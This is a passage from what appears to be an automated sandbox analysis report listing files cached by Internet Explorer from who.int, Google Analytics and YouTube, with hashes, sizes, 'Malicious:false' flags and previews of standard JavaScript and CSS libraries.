                                                                                                                                                                    Preview: wOFF......Mp.......P........................GDEF.......G...d....GPOS...............hGSUB............7b..OS/2.......R...`tq#.cmap...........L....cvt .......T...T+...fpgm.......5....w.`.gasp...@............glyf...L..:+..j.....hdmx..Fx...g........head..F....6...6.j.zhhea..G........$....hmtx..G8...]......Vlloca..I.........?.#.maxp..Kt... ... ....name..K........t.U9.post..Ld....... .m.dprep..Lx.......I.f..x...1..P......PB..U.=l.@..B)..w.......Y.e.u.m.C.s...x.h.~R....R.....2.x.....[....#N..m.m.m.mfm....SP..NuM..9]..=.U..!...[........w...|......^p....H......;...)..........;..EoDo....E.E.D...`.0.GG.aA.H.V.Mx\xA....../..d3.Eb_.J...R.^v........\^ob.}.z..k.x).v$f$..O)+.2..*....y}6`C6b.6cs...l...........!.........<..|.|..|..|..|.|....o....I%.4.L.SI.&C.6..!`...{...c..\.J.(.2.C....V.A..?.M<nG......v..m.;..R.C..aj.H...=..{.>.:.....}i_Y......:....o.&k..KY.2..6k....i]..{,.p}../.....VO3.o].fJ....R-TZ..;...RN..&V...C...3.?.......&..z.s&.D....r,.I...t.R..a$k..Mm..Y.U...+b.%kQ..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\analytics[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):48759
                                                                                                                                                                    Entropy (8bit):5.5215063523389265
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:/yR3fYFBLbfsce5XqY1TyPnHpX/KWY3SoavPVRhwmCgYUD0lgEw0stZc:/y9gZfA5h1UHpXxY3Soiuw0sU
                                                                                                                                                                    MD5:0A4E309B5F2D7439B4F8876B19F37FC7
                                                                                                                                                                    SHA1:7AC30F933A2B889EDBE5D3449F4EC90049B0E2A9
                                                                                                                                                                    SHA-256:F79723478F4C48501CD49AC52B81D6244A6562B9D3F08CE8AB208A8B8878D4C4
                                                                                                                                                                    SHA-512:891337D9CD308331BD0166BAA7C99C2B856D47F0ADE8AF596F71AFFC962546BBE0952554C51CC9A10E28BB4CEE3648AEC819D83A8935E69E95F53F5CBF141C44
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                    Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};var q={},r=function(){q.TAGGING=q.TAGGING||[];q.TAGGING[1]=!0};var t=function(a,b){for(var c in b)b.hasOwnProperty(c)&&(a[c]=b[c])},v=function(a){for(var b in a)if(a.hasOwnProperty(b))return!0;return!1};var x=/^(?:(?:https?|mailto|ftp):|[^:/?#]*(?:[/?#]|$))/i;var y=window,z=document,A=function(a,b){z.addEventListener?z.addEventListener(a,b,!1):z.attachEvent&&z.attachEvent("on"+a,b)};var B=/:[0-9]+$/,C=function(a,b,c){a=a.split("&");for(var d=0;d<a.length;d++){var e=a[d].split("=");if(decodeURIComponent(e[0]).replace(/\+/g," ")===b)return b=e.slice(1).join("="),c?b:decodeURIComponent(b).replace(/\+/g," ")}},F=function(a,b){b&&(b=String(b).toLowerCase());if("p
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\auto-complete.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3928
                                                                                                                                                                    Entropy (8bit):5.059292176433517
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:Wd+qgMN7GgZdOCB/BeQQ3hlPNgVy8TWbYbpLQcDjbCG3c48MlI7fuYLy:HJMZDdOCB/BeJ3fPNgVyvYbpL57CGM4r
                                                                                                                                                                    MD5:C9A1F1D2B5CC6BF36870A3789F605192
                                                                                                                                                                    SHA1:11137CABDC730169357EC6003C220FB5FD50D2B4
                                                                                                                                                                    SHA-256:8B83BBF4BB1A06D0CABD66D27CE16097E2193E6BA61202315036A762F3BF9450
                                                                                                                                                                    SHA-512:23E9593F7CA1EEB3A7A2CF52F6629AC9AA58A49E3C7E92B2A4606847599ADEA222F057BFBC534E765F7E7A8F532256F1C5240BDDD72E54DEDC1B407619C31CDC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/auto-complete.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: // jQuery autoComplete v1.0.7..// https://github.com/Pixabay/jQuery-autoComplete..!function(e){e.fn.autoComplete=function(t){var o=e.extend({},e.fn.autoComplete.defaults,t);return"string"==typeof t?(this.each(function(){var o=e(this);"destroy"==t&&(e(window).off("resize.autocomplete",o.updateSC),o.off("blur.autocomplete focus.autocomplete keydown.autocomplete keyup.autocomplete"),o.data("autocomplete")?o.attr("autocomplete",o.data("autocomplete")):o.removeAttr("autocomplete"),e(o.data("sc")).remove(),o.removeData("sc").removeData("autocomplete"))}),this):this.each(function(){function t(e){var t=s.val();if(s.cache[t]=e,e.length&&t.length>=o.minChars){for(var a="",c=0;c<e.length;c++)a+=o.renderItem(e[c],t);s.sc.html(a),s.updateSC(0)}else s.sc.hide()}var s=e(this);s.sc=e('<div class="autocomplete-suggestions '+o.menuClass+'"></div>'),s.data("sc",s.sc).data("autocomplete",s.attr("autocomplete")),s.attr("autocomplete","off"),s.cache={},s.last_val="",s.updateSC=function(t,o){if(s.sc.css({top
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\base[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1630322
                                                                                                                                                                    Entropy (8bit):5.577291963933718
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:XWG+SfiJoKIJmJfTMuyeSLTbglaEi3SibdnbyhSSuHe19:F54oKIJm5MuyeSLTbKaEX0Vyw89
                                                                                                                                                                    MD5:E7FC0B8E59C033566F83DD2B487FDD97
                                                                                                                                                                    SHA1:454A31823C255A961C6DD5F9EFEFD751289817A8
                                                                                                                                                                    SHA-256:EA2F8F066A67198D936648960646B97C9D8B12D6CA4D3D6C469C11D57B80E826
                                                                                                                                                                    SHA-512:94E3FD113869D0B5A5533E88AE9430272167E8A27D957792FCDC937FBC7F3BD4C1047B4E623E94606A2F687A25F4DC5B590D5DB73BACC3021196D2592603257B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/player_ias.vflset/en_US/base.js
                                                                                                                                                                    Preview: var _yt_player={};(function(g){var window=this;/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var ba,da,aaa,ia,ka,la,qa,ra,sa,ua,va,wa,baa,caa,xa,ya,daa,za,Aa,Ba,Da,Ea,Ia,Ga,La,Ma,gaa,haa,Va,Wa,Xa,iaa,jaa,Ya,kaa,Za,$a,laa,maa,bb,ib,naa,pb,qb,oaa,vb,sb,paa,tb,qaa,raa,saa,Fb,Hb,Ib,Jb,Mb,Ob,Pb,Sb,Yb,$b,dc,ec,ic,kc,lc,vaa,mc,nc,oc,xc,yc,Ac,Fc,Mc,Nc,Rc,Pc,zaa,Caa,Daa,Eaa,Wc,Xc,Zc,Yc,ad,dd,Faa,Gaa,cd,Haa,jd,kd,ld,md,pd,qd,rd,sd,Jaa,td,ud,yd,zd,Ad,Bd,Cd,Dd,Ed,Fd,Hd,Jd,Kd,Md,Nd,Od,Laa,Pd,Qd,Rd,Sd,Td,Ud,be,de,ge,ke,le,te,ue,xe,ve,ze,Ce,Be,Ae,Qaa,ie,Qe,Oe,Pe,Se,Re,he,Te,Saa,Xe,Ze,We,af,.bf,cf,df,ef,hf,jf,kf,lf,mf,Taa,rf,nf,tf,wf,xf,Df,Af,Bf,Uaa,Ef,Cf,Ff,Gf,Vaa,Hf,If,Jf,Kf,Lf,Nf,Mf,Of,Pf,Yaa,$aa,aba,cba,Rf,Sf,Tf,Vf,Wf,Xf,Zf,Yf,eba,dba,ag,cg,ig,jg,mg,fba,pg,og,qg,gba,Ag,Bg,Cg,hba,Dg,Eg,Fg,Gg,Hg,Ig,Jg,iba,Kg,Lg,Mg,jba,kba,Ng,Pg,Og,Rg,Sg,Vg,Tg,mba,Ug,Wg,oba,nba,pba,Zg,qba,ah,bh,ch,$g,dh,rba,eh,sba,tba,hh,vba,ih,jh,kh,wba,mh,oh,uh,xh,zh,wh,vh,Ah,xba,B
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\embed[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):24206
                                                                                                                                                                    Entropy (8bit):5.489337007916026
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:gYRgyq+e82lVe4EybAwwNZogt6NcI/3C9ox1KOokdTUYuCDe+oelLGzjp86psMLR:0+1ieaDAa/C2fdoYuCjMjeYTLR
                                                                                                                                                                    MD5:A448025FA3F661B02A0BA439410E240A
                                                                                                                                                                    SHA1:289E6A0C054BD07384BBD13C813A49DA16CD4A34
                                                                                                                                                                    SHA-256:3F320F374543A2C2FA09A654BE7E75E245253477AF56D0BFCF429A132439994E
                                                                                                                                                                    SHA-512:3F111A8C4C375AE4677AE04572F8251DC78D9FB78A82C246DE4DF9CC38552D34E53CF1FDBD7717F5CE8019A2F1BEE62608B3021AEBABA09D87AE94CF19BA7043
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/player_ias.vflset/en_US/embed.js
                                                                                                                                                                    Preview: (function(g){var window=this;'use strict';var PHa=function(a,b){var c=(b-a.i)/(a.l-a.i);if(0>=c)return 0;if(1<=c)return 1;for(var d=0,e=1,f=0,h=0;8>h;h++){f=g.vn(a,c);var l=(g.vn(a,c+1E-6)-f)/1E-6;if(1E-6>Math.abs(f-b))return c;if(1E-6>Math.abs(l))break;else f<b?d=c:e=c,c-=(f-b)/l}for(h=0;1E-6<Math.abs(f-b)&&8>h;h++)f<b?(d=c,c=(c+e)/2):(e=c,c=(c+d)/2),f=g.vn(a,c);return c},U2=function(){return{D:"svg",.U:{height:"100%",version:"1.1",viewBox:"0 0 110 26",width:"100%"},S:[{D:"path",Lb:!0,K:"ytp-svg-fill",U:{d:"M 16.68,.99 C 13.55,1.03 7.02,1.16 4.99,1.68 c -1.49,.4 -2.59,1.6 -2.99,3 -0.69,2.7 -0.68,8.31 -0.68,8.31 0,0 -0.01,5.61 .68,8.31 .39,1.5 1.59,2.6 2.99,3 2.69,.7 13.40,.68 13.40,.68 0,0 10.70,.01 13.40,-0.68 1.5,-0.4 2.59,-1.6 2.99,-3 .69,-2.7 .68,-8.31 .68,-8.31 0,0 .11,-5.61 -0.68,-8.31 -0.4,-1.5 -1.59,-2.6 -2.99,-3 C 29.11,.98 18.40,.99 18.40,.99 c 0,0 -0.67,-0.01 -1.71,0 z m 72.21,.90 0,21.28 2.78,0 .31,-1.37 .09,0 c .3,.5 .71,.88 1.21,1.18 .5,.3 1.08,.40 1.68,.40 1.1,0 1.99,-0
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\geo-navigation.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):4042
                                                                                                                                                                    Entropy (8bit):4.97739876980254
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:etEbrus4gEOKpnlU6JZLgLBsB/u/KWjZxhcsZyycsKgxeqSQnlY2USBhUAStg0B6:eSbCgErnW0ahJmcnn+SuCQw8HR6H
                                                                                                                                                                    MD5:BAE0D95FBD9D5D06396203EBBC2D7AD4
                                                                                                                                                                    SHA1:21C148D0196327A1B7A888FF9B3FAE2E3CA8CF9B
                                                                                                                                                                    SHA-256:3606C9C51D3E40A62B104ADC154201393BCD2F32EEAB24B9E68F30640ADE49FD
                                                                                                                                                                    SHA-512:7AB4CBC0FA65E3B9BFA4106EB0A8D8DE76EC8DD903A1D9AA5434A40453E67EC407B36CE479C612AF3A0E603F78CE4C1252857747E032F710DB5CF28CB48B4538
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/geo-navigation.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: "use strict";var windowWidth=$(window).width(),desktopMin=1020,geoNavigationContainer=$("#sf-geo-navigation-container"),geoNavigationContainerMobile=$(".sf-geo-navigation-selector"),geoNavigation=geoNavigationContainer.find(".sf-primary-geo-navigation"),geoNavigationMobile=geoNavigationContainerMobile.find(".sf-primary-geo-navigation"),primaryGeoNavigationListItem=geoNavigation.find("> li"),primaryGeoNavigationListItemMobile=geoNavigationMobile.find("> li"),GeoNavigation={primaryLevel:function(){primaryGeoNavigationListItem.each(function(){var $this=$(this);$(".mainnav_overlay").length||$("body").prepend('<div class="mainnav_overlay"></div>'),$this.on("click",function(){$(this);!$(this).hasClass("open")&&$(this).find(".sf-secondary-geo-navigation-container").length?(primaryGeoNavigationListItem.removeClass("open"),primaryGeoNavigationListItem.find(".sf-secondary-geo-navigation-container").slideUp(),$(this).find(".sf-secondary-geo-navigation-container").slideDown(),$(this).addClass("ope
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\grid.min[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):9776
                                                                                                                                                                    Entropy (8bit):4.92362429027669
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:HeQVzGIs8vm9acJbnJVHKn1i3Jvit7E1blgweYRRpY4QgC0wopv2kcDt764ak98m:Fz6PI1XYg0uduASZGwk4iWED2oY02+Pt
                                                                                                                                                                    MD5:18D5B7714456CFEE0D12D865B29F53E3
                                                                                                                                                                    SHA1:ABB438FE358984E08CDE0C8CB4DD3B28C7827D68
                                                                                                                                                                    SHA-256:D382145051E07802C5A1C9D297284DBAB6C8E780821A7743937CD8B54CD4748D
                                                                                                                                                                    SHA-512:5F47246A02819D0BE396E7CBD481453FBC879DE3BD983CB5602CC9D1DD522A6936D57AB84072FA7C75ACBDA4FC37A579BCC4302BA5795A610D7FCD0C87756729
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/styles/grid.min.css?v=12.1.7126.28741
                                                                                                                                                                    Preview: /*!.. * Bootstrap Grid v4.1.3 (https://getbootstrap.com/).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */@-ms-viewport{width:device-width}html{box-sizing:border-box;-ms-overflow-style:scrollbar}*,*:before,*:after{box-sizing:inherit}.container{width:100%;padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.container:before,.container:after{content:" ";display:table}.container:after{clear:both}@media (min-width: 768px){.container{max-width:1230px}}@media (min-width: 1020px){.container{max-width:1630px;padding-right:30px;padding-left:30px}}@media (min-width: 1600px){.container{max-width:1630px}}.container-sm{width:100%;padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto;max-width:1335px}.container-sm:before,.container-sm:after{content:" ";display:table}.container-sm:after{clear:both}@media (min-width: 1020px){.container-sm{width:81
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\gridTabs.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3554
                                                                                                                                                                    Entropy (8bit):5.185775961938888
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:4Pd/ZZMhMvMRHjJB+qW+HSS3B99icWptI/8cWXFe4NXxv:4PdHkq0DT+qtHSkB9Rwy/FYeyXxv
                                                                                                                                                                    MD5:82C552DDA2DC66965C51340C8F207634
                                                                                                                                                                    SHA1:1DA244FBD4486C31DCF4C82AC0D83E66E924A7F4
                                                                                                                                                                    SHA-256:D282FEB90B2423F859BA7E658C76B24BC7644A3B3731C9DE4214785C5D29D09D
                                                                                                                                                                    SHA-512:E1C8622512661F93E45218873F412A1632935605B1AC20B3225628B6CC88EC0A8996DF75137E2B04DA069403BF6133E66C0563AAAA05B19C5D83980B87975284
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/gridTabs.min.js
                                                                                                                                                                    Preview: "use strict";!function($){function tabWidget(){$("body").hasClass("sfPageEditor")&&!$(".tabWidget").hasClass("health-topic_tabWidget")||$(".tabWidget").each(function(){var tabWrapper=$(this),tabsCount=0,hash=window.location.hash,allUrlTabIds=[],publicationUrl="";tabWrapper.addClass("tabWrapper");var tabWrapperUL=tabWrapper.find("ul.tabs");function adjustTabWidth(){tabWrapperUL.removeClass("sf-tab-show-hidden"),tabWrapperUL.width()<=640?3<=tabsCount?tabWrapperUL.find("li").each(function(i,li){0==i||i==tabsCount?$(li).css("width","50%").addClass("shown").removeClass("hidden"):$(li).css("width","100%").addClass("hidden").removeClass("shown")}):tabWrapperUL.find("li").each(function(i,li){$(li).css("width","50%").addClass("shown").removeClass("hidden")}):(tabWrapperUL.find("li").each(function(i,li){$(li).css("width",100/tabsCount+"%").addClass("shown").removeClass("hidden")}),$(".mobile-tab").addClass("hidden").removeClass("shown"))}function hashHandler(){if(window.location.hash&&!$("body")
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\kendo.ui.core.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):803934
                                                                                                                                                                    Entropy (8bit):5.222077205830172
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:QEhAfJKgbCSmZdO9cUi2YalCdAeEVBZn7zKy52gpLCefV0G8I9r2XixiHe0ms2eG:QEi30ZMdlCdeV9KpR3Y4PuqfoTeRnje
                                                                                                                                                                    MD5:7628C881DE245BBBD90C7E3275ED0CF6
                                                                                                                                                                    SHA1:047FD3A34DD8FF151D9EC5CB4B761FD686F5BA40
                                                                                                                                                                    SHA-256:97C447F965A97D0616E759515E2B04EE226B9F428CDAEFA5D7F4622E171B0227
                                                                                                                                                                    SHA-512:609EF651800C2D9374B4CAAB553A41F8AA6BCE92EE9E5AF812B17157806A8E60E33FAE910E04BF29599C8036216B3A02E8D8F807637EFBCBFD850341860401B0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://kendo.cdn.telerik.com/2018.1.221/js/kendo.ui.core.min.js
                                                                                                                                                                    Preview: /** . * Copyright 2018 Telerik AD . * . * Licensed under the Apache License, Version 2.0 (the "License"); . * you may not use this file except in compliance with the License. . * You may obtain a copy of the License at
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\lazy.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):5023
                                                                                                                                                                    Entropy (8bit):5.23885542276114
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:SJDcAeLclix/2TDevsJOV+x2VMOtZBqDZpqg8WcIfDIqLbY:KiwevQx2xtPqDz8WPRbY
                                                                                                                                                                    MD5:FFE17BDB80CBFD966472372D2FD4FDCF
                                                                                                                                                                    SHA1:79D919E6703EB3961482E65B2B39E64E713589B6
                                                                                                                                                                    SHA-256:B97A1A0CD9D3B8FBD5DA3EA8B471D88CBDAB6716C69A879AC4A985DB0430BBB3
                                                                                                                                                                    SHA-512:A485E523CF715EB89836F28D85D7057BB4140282C7BFCD3787CEE7FF185B0A3F4895825F6094CF2EB544C968461999091BAD9028677169FB2DD601B3903A12B6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/lazy.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: /*! jQuery & Zepto Lazy v1.7.8 - http://jquery.eisbehr.de/lazy - MIT&GPL-2.0 license - Copyright 2012-2018 Daniel 'Eisbehr' Kern */..!function(t,e){"use strict";function r(r,a,i,u,l){function f(){L=t.devicePixelRatio>1,i=c(i),a.delay>=0&&setTimeout(function(){s(!0)},a.delay),(a.delay<0||a.combined)&&(u.e=v(a.throttle,function(t){"resize"===t.type&&(w=B=-1),s(t.all)}),u.a=function(t){t=c(t),i.push.apply(i,t)},u.g=function(){return i=n(i).filter(function(){return!n(this).data(a.loadedName)})},u.f=function(t){for(var e=0;e<t.length;e++){var r=i.filter(function(){return this===t[e]});r.length&&s(!1,r)}},s(),n(a.appendScroll).on("scroll."+l+" resize."+l,u.e))}function c(t){var i=a.defaultImage,o=a.placeholder,u=a.imageBase,l=a.srcsetAttribute,f=a.loaderAttribute,c=a._f||{};t=n(t).filter(function(){var t=n(this),r=m(this);return!t.data(a.handledName)&&(t.attr(a.attribute)||t.attr(l)||t.attr(f)||c[r]!==e)}).data("plugin_"+a.name,r);for(var s=0,d=t.length;s<d;s++){var A=n(t[s]),g=m(t[s]),h=A.a
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\main-navigation.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):9828
                                                                                                                                                                    Entropy (8bit):5.093226424905402
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:8QbztLkPc/BXT+6eaaR20BRynnCLEh6It:8QtLkPc/BiIaMsUnnCLK
                                                                                                                                                                    MD5:1612563D9D28237C5EB9D49DEADAAA6F
                                                                                                                                                                    SHA1:AC41D001EEAE6DABDFC05FE39A8B44D9F8686E80
                                                                                                                                                                    SHA-256:DAC30600520A22929B8B243673C877984B73F925031B93F826464940B3B651B4
                                                                                                                                                                    SHA-512:C47461C8B1299FEAB5E8C5EA47374F6E3436C125DD7EFD6F4C021ECB004236010479E9E7B747B6EA737E93A1BDB89488011EC63969DA10F229CFBC53BF12BFFF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/main-navigation.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: "use strict";var _scroll,_wresize,_mobile,_show,_go,_window=$(window),_document=$(document),_body=$("body"),_tablet=1020,_navigationWrapper=$(".navWrapper"),_navigationWrapperMobile=$(".slicknav_menu"),_singleNavigationContainer=$(".sf-simple-nav-container"),_singleNavigation=".sf-simple-nav",_dropdownLayout=_navigationWrapper.find(".navItemLayout"),_dropdownLayoutMobile=_navigationWrapperMobile.find(".navItemLayout"),_navigation=$("#navigationToScrape"),_mobileHeaderNavContainer=$("#sf-main-header"),_navigationPos=_navigation.offset().top,_once=!0,_time=600,_init=!1,mainNavigation={desktopNav:function(){var _this=this;_navigationWrapper.each(function(){$(".mainnav_overlay").length||$("body").prepend('<div class="mainnav_overlay"></div>');var thisNavigationWrapper=$(this),navigationUL=thisNavigationWrapper.find("ul.nav"),navigationULMobile=thisNavigationWrapper.find("ul.nav-mobile"),navParentLinkContainer=thisNavigationWrapper.find(".navParent");thisNavigationWrapper.find(".navParent u
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\main.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):11430
                                                                                                                                                                    Entropy (8bit):5.144594889515115
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:nciHiFmzS8agB6KIyxWalg5iApyjh8HdHY3bEmCVKqvYkNK:nc38agB6KIyxWSg59py/AmUXYEK
                                                                                                                                                                    MD5:9FCF4BF717E1E57B5FE08F04FDB789E3
                                                                                                                                                                    SHA1:C80842DE477C3003968A5CC6A6094085395E1015
                                                                                                                                                                    SHA-256:B0A8FF662B7C4C48AACAED961DC95DD5510AF4FB4332A8C032515A643BDBD9C3
                                                                                                                                                                    SHA-512:066E8FDA471B72CE5857CC8D583568F275D80F815CCCCB8A0D5EE47FC0651081B6F83E70E8DFB477FB34AD805AC4184D14E8A7621C726486D691669450007732
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/main.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: "use strict";var windowWidth=$(window).width(),desktopMin=768,WHOCms={verticalListHighlight:function(){$(".vertical-list--full-width").each(function(){$(this).addClass("flex-row"),$(this).children().first().addClass("vertical-list-item--highlight").wrapAll("<div class='flex-col flex-col-4'></div>"),$(this).children().not(":first-child").wrapAll("<div class='flex-col flex-col-8'></div>")})},movedNavigationSearchToHeader:function(){$(".top-header .navigation-search").length&&$(".top-header .navigation-search").clone().insertAfter(".main-header .header-logo")},searchOverlay:function(){var that=this,headerContainer=$(".main-header .container, .top-header .container"),navigationContainer=$(".navigation-search"),searchForm=$("#search-form"),searchInput=$(".searchInput");if(navigationContainer.length&&searchForm.length){headerContainer.find(".navigation-search").length||headerContainer.append(navigationContainer.clone(!0)),$(".search-overlay").length||($("#search-form").wrapAll('<div class="s
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\modernizr-custom[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1932
                                                                                                                                                                    Entropy (8bit):5.322270716802443
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:k0goRY6Y+rED6l7zgFRDqBRYDy2ijbKcWOy5AZvxzC4Bb99Un/0b6+:k0VW6Ymi6i2Yy2i8Ux+4BHk0R
                                                                                                                                                                    MD5:5D426B02B9C57CB59F9794FB7F3C3B08
                                                                                                                                                                    SHA1:BCB93536FF21E28F492CB58FD84D758EA212904A
                                                                                                                                                                    SHA-256:B4E726211A45841267D6928692F63B03F1D05EE004619631731973521BFF0DC8
                                                                                                                                                                    SHA-512:E1CA135DAA723C385D1F5C719D77BB72CDC3308F43287E8216ABEA99869C8728C1E89D641188D759E85D1045536E3AFE803856916AF2AF9CEE57D2475D3FEA14
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/modernizr-custom.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: "use strict";function _typeof(obj){"@babel/helpers - typeof";if(typeof Symbol==="function"&&typeof Symbol.iterator==="symbol"){_typeof=function _typeof(obj){return typeof obj;};}else{_typeof=function _typeof(obj){return obj&&typeof Symbol==="function"&&obj.constructor===Symbol&&obj!==Symbol.prototype?"symbol":typeof obj;};}return _typeof(obj);}/*! modernizr 3.6.0 (Custom Build) | MIT *.* https://modernizr.com/download/?-setclasses !*/.!function(n,e,s){function o(n,e){return _typeof(n)===e;}.function a(){var n,e,s,a,i,l,r;for(var c in f){if(f.hasOwnProperty(c)){if(n=[],e=f[c],e.name&&(n.push(e.name.toLowerCase()),e.options&&e.options.aliases&&e.options.aliases.length))for(s=0;s<e.options.aliases.length;s++){n.push(e.options.aliases[s].toLowerCase());}.for(a=o(e.fn,"function")?e.fn():e.fn,i=0;i<n.length;i++){l=n[i],r=l.split("."),1===r.length?Modernizr[r[0]]=a:(!Modernizr[r[0]]||Modernizr[r[0]]instanceof Boolean||(Modernizr[r[0]]=new Boolean(Modernizr[r[0]])),Modernizr[r[0]][r[1]]=a),t.p
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\picturefill.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
